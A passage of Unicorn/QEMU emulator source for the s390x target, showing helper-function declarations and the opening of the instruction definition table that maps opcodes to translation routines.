ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc_rt16, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc_rt32, void, ptr, cptr, cptr, cptr, env, i32) /* === Vector Floating-Point Instructions */ DEF_HELPER_FLAGS_5(gvec_vfa64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfa64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_4(gvec_wfc64, void, cptr, cptr, env, i32) DEF_HELPER_4(gvec_wfk64, void, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfce64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfce64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfce64_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfce64s_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfch64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfch64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfch64_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfch64s_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfche64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfche64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfche64_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfche64s_cc, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcdg64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcdg64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcdlg64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcdlg64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcgd64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vcgd64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vclgd64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vclgd64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfd64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfd64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfi64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfi64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfll32, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfll32s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vflr64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vflr64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfm64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfm64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_6(gvec_vfma64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_6(gvec_vfma64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_6(gvec_vfms64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_6(gvec_vfms64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfsq64, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfsq64s, TCG_CALL_NO_WG, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfs64, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vfs64s, TCG_CALL_NO_WG, void, ptr, cptr, cptr, env, i32) DEF_HELPER_4(gvec_vftci64, void, ptr, cptr, env, i32) DEF_HELPER_4(gvec_vftci64s, void, ptr, cptr, env, i32) #ifndef CONFIG_USER_ONLY DEF_HELPER_3(servc, i32, env, i64, i64) DEF_HELPER_4(diag, void, env, i32, i32, i32) DEF_HELPER_3(load_psw, noreturn, env, i64, i64) DEF_HELPER_FLAGS_2(spx, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(sck, TCG_CALL_NO_RWG, i32, env, i64) DEF_HELPER_FLAGS_2(sckc, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(sckpf, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_1(stckc, TCG_CALL_NO_RWG, i64, env) DEF_HELPER_FLAGS_2(spt, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_4(stsi, i32, env, i64, i64, i64) DEF_HELPER_FLAGS_4(lctl, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_4(lctlg, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_4(stctl, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_4(stctg, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_2(testblock, TCG_CALL_NO_WG, i32, env, i64) DEF_HELPER_FLAGS_3(tprot, TCG_CALL_NO_WG, i32, env, i64, i64) DEF_HELPER_FLAGS_2(iske, TCG_CALL_NO_RWG_SE, i64, env, i64) DEF_HELPER_FLAGS_3(sske, TCG_CALL_NO_RWG, void, env, i64, i64) DEF_HELPER_FLAGS_2(rrbe, TCG_CALL_NO_RWG, i32, env, i64) DEF_HELPER_4(mvcs, i32, env, i64, i64, i64) DEF_HELPER_4(mvcp, i32, env, i64, i64, i64) DEF_HELPER_4(sigp, i32, env, i64, i32, i32) DEF_HELPER_FLAGS_2(sacf, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_4(idte, TCG_CALL_NO_RWG, void, env, i64, i64, i32) DEF_HELPER_FLAGS_4(ipte, TCG_CALL_NO_RWG, void, env, i64, i64, i32) DEF_HELPER_FLAGS_1(ptlb, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(purge, TCG_CALL_NO_RWG, void, env) DEF_HELPER_2(lra, i64, env, i64) DEF_HELPER_1(per_check_exception, void, env) DEF_HELPER_FLAGS_3(per_branch, TCG_CALL_NO_RWG, void, env, i64, i64) DEF_HELPER_FLAGS_2(per_ifetch, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_1(per_store_real, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(stfl, TCG_CALL_NO_RWG, void, env) DEF_HELPER_2(xsch, void, env, i64) DEF_HELPER_2(csch, void, env, i64) DEF_HELPER_2(hsch, void, env, i64) DEF_HELPER_3(msch, void, env, i64, i64) DEF_HELPER_2(rchp, void, env, i64) DEF_HELPER_2(rsch, void, env, i64) DEF_HELPER_2(sal, void, env, i64) DEF_HELPER_4(schm, void, env, i64, i64, i64) DEF_HELPER_3(ssch, void, env, i64, i64) DEF_HELPER_2(stcrw, void, env, i64) DEF_HELPER_3(stsch, void, env, i64, i64) DEF_HELPER_2(tpi, i32, env, i64) DEF_HELPER_3(tsch, void, env, i64, i64) DEF_HELPER_2(chsc, void, env, i64) DEF_HELPER_2(clp, void, env, i32) DEF_HELPER_3(pcilg, void, env, i32, i32) DEF_HELPER_3(pcistg, void, env, i32, i32) DEF_HELPER_4(stpcifc, void, env, i32, i64, i32) DEF_HELPER_3(sic, void, env, i64, i64) DEF_HELPER_3(rpcit, void, env, i32, i32) DEF_HELPER_5(pcistb, void, env, i32, i32, i64, i32) DEF_HELPER_4(mpcifc, void, env, i32, i64, i32) #endif ��������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/insn-data.def�������������������������������������������������������0000664�0000000�0000000�00000211553�14675241067�0020674�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Arguments to the opcode prototypes * * C(OPC, NAME, FMT, FAC, I1, I2, P, W, OP, CC) * D(OPC, NAME, FMT, FAC, I1, I2, P, W, OP, CC, DATA) * E(OPC, NAME, FMT, FAC, I1, I2, P, W, OP, CC, DATA, FLAGS) * F(OPC, NAME, FMT, FAC, I1, I2, P, W, OP, CC, FLAGS) * * OPC = (op << 8) | op2 where op is the major, op2 the minor opcode * NAME = name of the opcode, used internally * FMT = format of the opcode (defined in insn-format.def) * FAC = facility the opcode is available in (defined in DisasFacility) * I1 = func in1_xx fills o->in1 * I2 = func in2_xx fills o->in2 * P = func prep_xx initializes o->*out* * W = func wout_xx writes o->*out* somewhere * OP = func op_xx does the bulk of the operation * CC = func cout_xx defines how cc should get set * DATA = immediate argument to op_xx function * FLAGS = categorize the type of instruction (e.g. for advanced checks) * * The helpers get called in order: I1, I2, P, OP, W, CC */ /* ADD */ C(0x1a00, AR, RR_a, Z, r1, r2, new, r1_32, add, adds32) C(0xb9f8, ARK, RRF_a, DO, r2, r3, new, r1_32, add, adds32) C(0x5a00, A, RX_a, Z, r1, m2_32s, new, r1_32, add, adds32) C(0xe35a, AY, RXY_a, LD, r1, m2_32s, new, r1_32, add, adds32) C(0xb908, AGR, RRE, Z, r1, r2, r1, 0, add, adds64) C(0xb918, AGFR, RRE, Z, r1, r2_32s, r1, 0, add, adds64) C(0xb9e8, AGRK, RRF_a, DO, r2, r3, r1, 0, add, adds64) C(0xe308, AG, RXY_a, Z, r1, m2_64, r1, 0, add, adds64) C(0xe318, AGF, RXY_a, Z, r1, m2_32s, r1, 0, add, adds64) F(0xb30a, AEBR, RRE, Z, e1, e2, new, e1, aeb, f32, IF_BFP) F(0xb31a, ADBR, RRE, Z, f1, f2, new, f1, adb, f64, IF_BFP) F(0xb34a, AXBR, RRE, Z, x2h, x2l, x1, x1, axb, f128, IF_BFP) F(0xed0a, AEB, RXE, Z, e1, m2_32u, new, e1, aeb, f32, IF_BFP) F(0xed1a, ADB, RXE, Z, f1, m2_64, new, f1, adb, f64, IF_BFP) /* ADD HIGH */ C(0xb9c8, AHHHR, RRF_a, HW, r2_sr32, r3_sr32, new, r1_32h, add, adds32) C(0xb9d8, AHHLR, RRF_a, HW, r2_sr32, r3, new, r1_32h, add, adds32) /* ADD IMMEDIATE */ C(0xc209, AFI, RIL_a, EI, r1, i2, new, r1_32, add, adds32) D(0xeb6a, ASI, SIY, GIE, la1, i2, new, 0, asi, adds32, MO_TESL) C(0xecd8, AHIK, RIE_d, DO, r3, i2, new, r1_32, add, adds32) C(0xc208, AGFI, RIL_a, EI, r1, i2, r1, 0, add, adds64) D(0xeb7a, AGSI, SIY, GIE, la1, i2, new, 0, asi, adds64, MO_TEQ) C(0xecd9, AGHIK, RIE_d, DO, r3, i2, r1, 0, add, adds64) /* ADD IMMEDIATE HIGH */ C(0xcc08, AIH, RIL_a, HW, r1_sr32, i2, new, r1_32h, add, adds32) /* ADD HALFWORD */ C(0x4a00, AH, RX_a, Z, r1, m2_16s, new, r1_32, add, adds32) C(0xe37a, AHY, RXY_a, LD, r1, m2_16s, new, r1_32, add, adds32) /* ADD HALFWORD IMMEDIATE */ C(0xa70a, AHI, RI_a, Z, r1, i2, new, r1_32, add, adds32) C(0xa70b, AGHI, RI_a, Z, r1, i2, r1, 0, add, adds64) /* ADD LOGICAL */ C(0x1e00, ALR, RR_a, Z, r1, r2, new, r1_32, add, addu32) C(0xb9fa, ALRK, RRF_a, DO, r2, r3, new, r1_32, add, addu32) C(0x5e00, AL, RX_a, Z, r1, m2_32u, new, r1_32, add, addu32) C(0xe35e, ALY, RXY_a, LD, r1, m2_32u, new, r1_32, add, addu32) C(0xb90a, ALGR, RRE, Z, r1, r2, r1, 0, add, addu64) C(0xb91a, ALGFR, RRE, Z, r1, r2_32u, r1, 0, add, addu64) C(0xb9ea, ALGRK, RRF_a, DO, r2, r3, r1, 0, add, addu64) C(0xe30a, ALG, RXY_a, Z, r1, m2_64, r1, 0, add, addu64) C(0xe31a, ALGF, RXY_a, Z, r1, m2_32u, r1, 0, add, addu64) /* ADD LOGICAL HIGH */ C(0xb9ca, ALHHHR, RRF_a, HW, r2_sr32, r3_sr32, new, r1_32h, add, addu32) C(0xb9da, ALHHLR, RRF_a, HW, r2_sr32, r3, new, r1_32h, add, addu32) /* ADD LOGICAL IMMEDIATE */ C(0xc20b, ALFI, RIL_a, EI, r1, i2_32u, new, r1_32, add, addu32) C(0xc20a, ALGFI, RIL_a, EI, r1, i2_32u, r1, 0, add, addu64) /* ADD LOGICAL WITH SIGNED IMMEDIATE */ D(0xeb6e, ALSI, SIY, GIE, la1, i2, new, 0, asi, addu32, MO_TEUL) C(0xecda, ALHSIK, RIE_d, DO, r3, i2, new, r1_32, add, addu32) D(0xeb7e, ALGSI, SIY, GIE, la1, i2, new, 0, asi, addu64, MO_TEQ) C(0xecdb, ALGHSIK, RIE_d, DO, r3, i2, r1, 0, add, addu64) /* ADD LOGICAL WITH SIGNED IMMEDIATE HIGH */ C(0xcc0a, ALSIH, RIL_a, HW, r1_sr32, i2, new, r1_32h, add, addu32) C(0xcc0b, ALSIHN, RIL_a, HW, r1_sr32, i2, new, r1_32h, add, 0) /* ADD LOGICAL WITH CARRY */ C(0xb998, ALCR, RRE, Z, r1, r2, new, r1_32, addc, addc32) C(0xb988, ALCGR, RRE, Z, r1, r2, r1, 0, addc, addc64) C(0xe398, ALC, RXY_a, Z, r1, m2_32u, new, r1_32, addc, addc32) C(0xe388, ALCG, RXY_a, Z, r1, m2_64, r1, 0, addc, addc64) /* AND */ C(0x1400, NR, RR_a, Z, r1, r2, new, r1_32, and, nz32) C(0xb9f4, NRK, RRF_a, DO, r2, r3, new, r1_32, and, nz32) C(0x5400, N, RX_a, Z, r1, m2_32s, new, r1_32, and, nz32) C(0xe354, NY, RXY_a, LD, r1, m2_32s, new, r1_32, and, nz32) C(0xb980, NGR, RRE, Z, r1, r2, r1, 0, and, nz64) C(0xb9e4, NGRK, RRF_a, DO, r2, r3, r1, 0, and, nz64) C(0xe380, NG, RXY_a, Z, r1, m2_64, r1, 0, and, nz64) C(0xd400, NC, SS_a, Z, la1, a2, 0, 0, nc, 0) /* AND IMMEDIATE */ D(0xc00a, NIHF, RIL_a, EI, r1_o, i2_32u, r1, 0, andi, 0, 0x2020) D(0xc00b, NILF, RIL_a, EI, r1_o, i2_32u, r1, 0, andi, 0, 0x2000) D(0xa504, NIHH, RI_a, Z, r1_o, i2_16u, r1, 0, andi, 0, 0x1030) D(0xa505, NIHL, RI_a, Z, r1_o, i2_16u, r1, 0, andi, 0, 0x1020) D(0xa506, NILH, RI_a, Z, r1_o, i2_16u, r1, 0, andi, 0, 0x1010) D(0xa507, NILL, RI_a, Z, r1_o, i2_16u, r1, 0, andi, 0, 0x1000) D(0x9400, NI, SI, Z, la1, i2_8u, new, 0, ni, nz64, MO_UB) D(0xeb54, NIY, SIY, LD, la1, i2_8u, new, 0, ni, nz64, MO_UB) /* BRANCH AND LINK */ C(0x0500, BALR, RR_a, Z, 0, r2_nz, r1, 0, bal, 0) C(0x4500, BAL, RX_a, Z, 0, a2, r1, 0, bal, 0) /* BRANCH AND SAVE */ C(0x0d00, BASR, RR_a, Z, 0, r2_nz, r1, 0, bas, 0) C(0x4d00, BAS, RX_a, Z, 0, a2, r1, 0, bas, 0) /* BRANCH RELATIVE AND SAVE */ C(0xa705, BRAS, RI_b, Z, 0, 0, r1, 0, basi, 0) C(0xc005, BRASL, RIL_b, Z, 0, 0, r1, 0, basi, 0) /* BRANCH ON CONDITION */ C(0x0700, BCR, RR_b, Z, 0, r2_nz, 0, 0, bc, 0) C(0x4700, BC, RX_b, Z, 0, a2, 0, 0, bc, 0) /* BRANCH RELATIVE ON CONDITION */ C(0xa704, BRC, RI_c, Z, 0, 0, 0, 0, bc, 0) C(0xc004, BRCL, RIL_c, Z, 0, 0, 0, 0, bc, 0) /* BRANCH ON COUNT */ C(0x0600, BCTR, RR_a, Z, 0, r2_nz, 0, 0, bct32, 0) C(0xb946, BCTGR, RRE, Z, 0, r2_nz, 0, 0, bct64, 0) C(0x4600, BCT, RX_a, Z, 0, a2, 0, 0, bct32, 0) C(0xe346, BCTG, RXY_a, Z, 0, a2, 0, 0, bct64, 0) /* BRANCH RELATIVE ON COUNT */ C(0xa706, BRCT, RI_b, Z, 0, 0, 0, 0, bct32, 0) C(0xa707, BRCTG, RI_b, Z, 0, 0, 0, 0, bct64, 0) /* BRANCH RELATIVE ON COUNT HIGH */ C(0xcc06, BRCTH, RIL_b, HW, 0, 0, 0, 0, bcth, 0) /* BRANCH ON INDEX */ D(0x8600, BXH, RS_a, Z, 0, a2, 0, 0, bx32, 0, 0) D(0x8700, BXLE, RS_a, Z, 0, a2, 0, 0, bx32, 0, 1) D(0xeb44, BXHG, RSY_a, Z, 0, a2, 0, 0, bx64, 0, 0) D(0xeb45, BXLEG, RSY_a, Z, 0, a2, 0, 0, bx64, 0, 1) /* BRANCH RELATIVE ON INDEX */ D(0x8400, BRXH, RSI, Z, 0, 0, 0, 0, bx32, 0, 0) D(0x8500, BRXLE, RSI, Z, 0, 0, 0, 0, bx32, 0, 1) D(0xec44, BRXHG, RIE_e, Z, 0, 0, 0, 0, bx64, 0, 0) D(0xec45, BRXHLE, RIE_e, Z, 0, 0, 0, 0, bx64, 0, 1) /* BRANCH PREDICTION PRELOAD */ /* ??? Format is SMI, but implemented as NOP, so we need no fields. */ C(0xc700, BPP, E, EH, 0, 0, 0, 0, 0, 0) /* BRANCH PREDICTION RELATIVE PRELOAD */ /* ??? Format is MII, but implemented as NOP, so we need no fields. */ C(0xc500, BPRP, E, EH, 0, 0, 0, 0, 0, 0) /* NEXT INSTRUCTION ACCESS INTENT */ /* ??? Format is IE, but implemented as NOP, so we need no fields. */ C(0xb2fa, NIAI, E, EH, 0, 0, 0, 0, 0, 0) /* CHECKSUM */ C(0xb241, CKSM, RRE, Z, r1_o, ra2, new, r1_32, cksm, 0) /* COPY SIGN */ F(0xb372, CPSDR, RRF_b, FPSSH, f3, f2, new, f1, cps, 0, IF_AFP1 | IF_AFP2 | IF_AFP3) /* COMPARE */ C(0x1900, CR, RR_a, Z, r1_o, r2_o, 0, 0, 0, cmps32) C(0x5900, C, RX_a, Z, r1_o, m2_32s, 0, 0, 0, cmps32) C(0xe359, CY, RXY_a, LD, r1_o, m2_32s, 0, 0, 0, cmps32) C(0xb920, CGR, RRE, Z, r1_o, r2_o, 0, 0, 0, cmps64) C(0xb930, CGFR, RRE, Z, r1_o, r2_32s, 0, 0, 0, cmps64) C(0xe320, CG, RXY_a, Z, r1_o, m2_64, 0, 0, 0, cmps64) C(0xe330, CGF, RXY_a, Z, r1_o, m2_32s, 0, 0, 0, cmps64) F(0xb309, CEBR, RRE, Z, e1, e2, 0, 0, ceb, 0, IF_BFP) F(0xb319, CDBR, RRE, Z, f1, f2, 0, 0, cdb, 0, IF_BFP) F(0xb349, CXBR, RRE, Z, x2h, x2l, x1, 0, cxb, 0, IF_BFP) F(0xed09, CEB, RXE, Z, e1, m2_32u, 0, 0, ceb, 0, IF_BFP) F(0xed19, CDB, RXE, Z, f1, m2_64, 0, 0, cdb, 0, IF_BFP) /* COMPARE AND SIGNAL */ F(0xb308, KEBR, RRE, Z, e1, e2, 0, 0, keb, 0, IF_BFP) F(0xb318, KDBR, RRE, Z, f1, f2, 0, 0, kdb, 0, IF_BFP) F(0xb348, KXBR, RRE, Z, x2h, x2l, x1, 0, kxb, 0, IF_BFP) F(0xed08, KEB, RXE, Z, e1, m2_32u, 0, 0, keb, 0, IF_BFP) F(0xed18, KDB, RXE, Z, f1, m2_64, 0, 0, kdb, 0, IF_BFP) /* COMPARE IMMEDIATE */ C(0xc20d, CFI, RIL_a, EI, r1, i2, 0, 0, 0, cmps32) C(0xc20c, CGFI, RIL_a, EI, r1, i2, 0, 0, 0, cmps64) /* COMPARE RELATIVE LONG */ C(0xc60d, CRL, RIL_b, GIE, r1, mri2_32s, 0, 0, 0, cmps32) C(0xc608, CGRL, RIL_b, GIE, r1, mri2_64, 0, 0, 0, cmps64) C(0xc60c, CGFRL, RIL_b, GIE, r1, mri2_32s, 0, 0, 0, cmps64) /* COMPARE HALFWORD */ C(0x4900, CH, RX_a, Z, r1_o, m2_16s, 0, 0, 0, cmps32) C(0xe379, CHY, RXY_a, LD, r1_o, m2_16s, 0, 0, 0, cmps32) C(0xe334, CGH, RXY_a, GIE, r1_o, m2_16s, 0, 0, 0, cmps64) /* COMPARE HALFWORD IMMEDIATE */ C(0xa70e, CHI, RI_a, Z, r1_o, i2, 0, 0, 0, cmps32) C(0xa70f, CGHI, RI_a, Z, r1_o, i2, 0, 0, 0, cmps64) C(0xe554, CHHSI, SIL, GIE, m1_16s, i2, 0, 0, 0, cmps64) C(0xe55c, CHSI, SIL, GIE, m1_32s, i2, 0, 0, 0, cmps64) C(0xe558, CGHSI, SIL, GIE, m1_64, i2, 0, 0, 0, cmps64) /* COMPARE HALFWORD RELATIVE LONG */ C(0xc605, CHRL, RIL_b, GIE, r1_o, mri2_32s, 0, 0, 0, cmps32) C(0xc604, CGHRL, RIL_b, GIE, r1_o, mri2_64, 0, 0, 0, cmps64) /* COMPARE HIGH */ C(0xb9cd, CHHR, RRE, HW, r1_sr32, r2_sr32, 0, 0, 0, cmps32) C(0xb9dd, CHLR, RRE, HW, r1_sr32, r2_o, 0, 0, 0, cmps32) C(0xe3cd, CHF, RXY_a, HW, r1_sr32, m2_32s, 0, 0, 0, cmps32) /* COMPARE IMMEDIATE HIGH */ C(0xcc0d, CIH, RIL_a, HW, r1_sr32, i2, 0, 0, 0, cmps32) /* COMPARE LOGICAL */ C(0x1500, CLR, RR_a, Z, r1, r2, 0, 0, 0, cmpu32) C(0x5500, CL, RX_a, Z, r1, m2_32s, 0, 0, 0, cmpu32) C(0xe355, CLY, RXY_a, LD, r1, m2_32s, 0, 0, 0, cmpu32) C(0xb921, CLGR, RRE, Z, r1, r2, 0, 0, 0, cmpu64) C(0xb931, CLGFR, RRE, Z, r1, r2_32u, 0, 0, 0, cmpu64) C(0xe321, CLG, RXY_a, Z, r1, m2_64, 0, 0, 0, cmpu64) C(0xe331, CLGF, RXY_a, Z, r1, m2_32u, 0, 0, 0, cmpu64) C(0xd500, CLC, SS_a, Z, la1, a2, 0, 0, clc, 0) /* COMPARE LOGICAL HIGH */ C(0xb9cf, CLHHR, RRE, HW, r1_sr32, r2_sr32, 0, 0, 0, cmpu32) C(0xb9df, CLHLR, RRE, HW, r1_sr32, r2_o, 0, 0, 0, cmpu32) C(0xe3cf, CLHF, RXY_a, HW, r1_sr32, m2_32s, 0, 0, 0, cmpu32) /* COMPARE LOGICAL IMMEDIATE */ C(0xc20f, CLFI, RIL_a, EI, r1, i2, 0, 0, 0, cmpu32) C(0xc20e, CLGFI, RIL_a, EI, r1, i2_32u, 0, 0, 0, cmpu64) C(0x9500, CLI, SI, Z, m1_8u, i2_8u, 0, 0, 0, cmpu64) C(0xeb55, CLIY, SIY, LD, m1_8u, i2_8u, 0, 0, 0, cmpu64) C(0xe555, CLHHSI, SIL, GIE, m1_16u, i2_16u, 0, 0, 0, cmpu64) C(0xe55d, CLFHSI, SIL, GIE, m1_32u, i2_16u, 0, 0, 0, cmpu64) C(0xe559, CLGHSI, SIL, GIE, m1_64, i2_16u, 0, 0, 0, cmpu64) /* COMPARE LOGICAL IMMEDIATE HIGH */ C(0xcc0f, CLIH, RIL_a, HW, r1_sr32, i2, 0, 0, 0, cmpu32) /* COMPARE LOGICAL RELATIVE LONG */ C(0xc60f, CLRL, RIL_b, GIE, r1_o, mri2_32u, 0, 0, 0, cmpu32) C(0xc60a, CLGRL, RIL_b, GIE, r1_o, mri2_64, 0, 0, 0, cmpu64) C(0xc60e, CLGFRL, RIL_b, GIE, r1_o, mri2_32u, 0, 0, 0, cmpu64) C(0xc607, CLHRL, RIL_b, GIE, r1_o, mri2_16u, 0, 0, 0, cmpu32) C(0xc606, CLGHRL, RIL_b, GIE, r1_o, mri2_16u, 0, 0, 0, cmpu64) /* COMPARE LOGICAL LONG */ C(0x0f00, CLCL, RR_a, Z, 0, 0, 0, 0, clcl, 0) /* COMPARE LOGICAL LONG EXTENDED */ C(0xa900, CLCLE, RS_a, Z, 0, a2, 0, 0, clcle, 0) /* COMPARE LOGICAL LONG UNICODE */ C(0xeb8f, CLCLU, RSY_a, E2, 0, a2, 0, 0, clclu, 0) /* COMPARE LOGICAL CHARACTERS UNDER MASK */ C(0xbd00, CLM, RS_b, Z, r1_o, a2, 0, 0, clm, 0) C(0xeb21, CLMY, RSY_b, LD, r1_o, a2, 0, 0, clm, 0) C(0xeb20, CLMH, RSY_b, Z, r1_sr32, a2, 0, 0, clm, 0) /* COMPARE LOGICAL STRING */ C(0xb25d, CLST, RRE, Z, r1_o, r2_o, 0, 0, clst, 0) /* COMPARE AND BRANCH */ D(0xecf6, CRB, RRS, GIE, r1_32s, r2_32s, 0, 0, cj, 0, 0) D(0xece4, CGRB, RRS, GIE, r1_o, r2_o, 0, 0, cj, 0, 0) D(0xec76, CRJ, RIE_b, GIE, r1_32s, r2_32s, 0, 0, cj, 0, 0) D(0xec64, CGRJ, RIE_b, GIE, r1_o, r2_o, 0, 0, cj, 0, 0) D(0xecfe, CIB, RIS, GIE, r1_32s, i2, 0, 0, cj, 0, 0) D(0xecfc, CGIB, RIS, GIE, r1_o, i2, 0, 0, cj, 0, 0) D(0xec7e, CIJ, RIE_c, GIE, r1_32s, i2, 0, 0, cj, 0, 0) D(0xec7c, CGIJ, RIE_c, GIE, r1_o, i2, 0, 0, cj, 0, 0) /* COMPARE LOGICAL AND BRANCH */ D(0xecf7, CLRB, RRS, GIE, r1_32u, r2_32u, 0, 0, cj, 0, 1) D(0xece5, CLGRB, RRS, GIE, r1_o, r2_o, 0, 0, cj, 0, 1) D(0xec77, CLRJ, RIE_b, GIE, r1_32u, r2_32u, 0, 0, cj, 0, 1) D(0xec65, CLGRJ, RIE_b, GIE, r1_o, r2_o, 0, 0, cj, 0, 1) D(0xecff, CLIB, RIS, GIE, r1_32u, i2_8u, 0, 0, cj, 0, 1) D(0xecfd, CLGIB, RIS, GIE, r1_o, i2_8u, 0, 0, cj, 0, 1) D(0xec7f, CLIJ, RIE_c, GIE, r1_32u, i2_8u, 0, 0, cj, 0, 1) D(0xec7d, CLGIJ, RIE_c, GIE, r1_o, i2_8u, 0, 0, cj, 0, 1) /* COMPARE AND SWAP */ D(0xba00, CS, RS_a, Z, r3_32u, r1_32u, new, r1_32, cs, 0, MO_TEUL) D(0xeb14, CSY, RSY_a, LD, r3_32u, r1_32u, new, r1_32, cs, 0, MO_TEUL) D(0xeb30, CSG, RSY_a, Z, r3_o, r1_o, new, r1, cs, 0, MO_TEQ) /* COMPARE DOUBLE AND SWAP */ D(0xbb00, CDS, RS_a, Z, r3_D32, r1_D32, new, r1_D32, cs, 0, MO_TEQ) D(0xeb31, CDSY, RSY_a, LD, r3_D32, r1_D32, new, r1_D32, cs, 0, MO_TEQ) C(0xeb3e, CDSG, RSY_a, Z, 0, 0, 0, 0, cdsg, 0) /* COMPARE AND SWAP AND STORE */ C(0xc802, CSST, SSF, CASS, la1, a2, 0, 0, csst, 0) /* COMPARE AND TRAP */ D(0xb972, CRT, RRF_c, GIE, r1_32s, r2_32s, 0, 0, ct, 0, 0) D(0xb960, CGRT, RRF_c, GIE, r1_o, r2_o, 0, 0, ct, 0, 0) D(0xec72, CIT, RIE_a, GIE, r1_32s, i2, 0, 0, ct, 0, 0) D(0xec70, CGIT, RIE_a, GIE, r1_o, i2, 0, 0, ct, 0, 0) /* COMPARE LOGICAL AND TRAP */ D(0xb973, CLRT, RRF_c, GIE, r1_32u, r2_32u, 0, 0, ct, 0, 1) D(0xb961, CLGRT, RRF_c, GIE, r1_o, r2_o, 0, 0, ct, 0, 1) D(0xeb23, CLT, RSY_b, MIE, r1_32u, m2_32u, 0, 0, ct, 0, 1) D(0xeb2b, CLGT, RSY_b, MIE, r1_o, m2_64, 0, 0, ct, 0, 1) D(0xec73, CLFIT, RIE_a, GIE, r1_32u, i2_32u, 0, 0, ct, 0, 1) D(0xec71, CLGIT, RIE_a, GIE, r1_o, i2_32u, 0, 0, ct, 0, 1) /* CONVERT TO DECIMAL */ C(0x4e00, CVD, RX_a, Z, r1_o, a2, 0, 0, cvd, 0) C(0xe326, CVDY, RXY_a, LD, r1_o, a2, 0, 0, cvd, 0) /* CONVERT TO FIXED */ F(0xb398, CFEBR, RRF_e, Z, 0, e2, new, r1_32, cfeb, 0, IF_BFP) F(0xb399, CFDBR, RRF_e, Z, 0, f2, new, r1_32, cfdb, 0, IF_BFP) 